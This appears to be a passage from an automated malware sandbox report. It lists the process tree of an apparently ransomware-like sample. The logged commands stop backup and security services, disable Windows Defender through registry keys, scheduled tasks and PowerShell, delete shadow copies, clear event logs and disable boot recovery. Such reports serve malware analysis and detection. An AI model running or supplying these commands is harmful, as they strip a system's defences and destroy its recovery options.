- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:824
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1976
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:288
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:300 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1928
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1572
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1644
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1704
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1696
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1432
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1768
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1968
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:2020
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1176
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1576
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:852
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1632
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1132
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:600
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1828
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1612
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1928
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1404
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1008
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1952
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1956
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1712
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:2032
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1264
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1172
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1684
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:956
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1736
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:580
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1972
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:440
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1808
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1840
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1748
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1740
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:760
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:536
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1724
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1892
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1664
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1644
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1692
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1256
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:912
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1520
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:288
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1904
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1584
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1756
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2056
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2088
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2160
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2180
-
-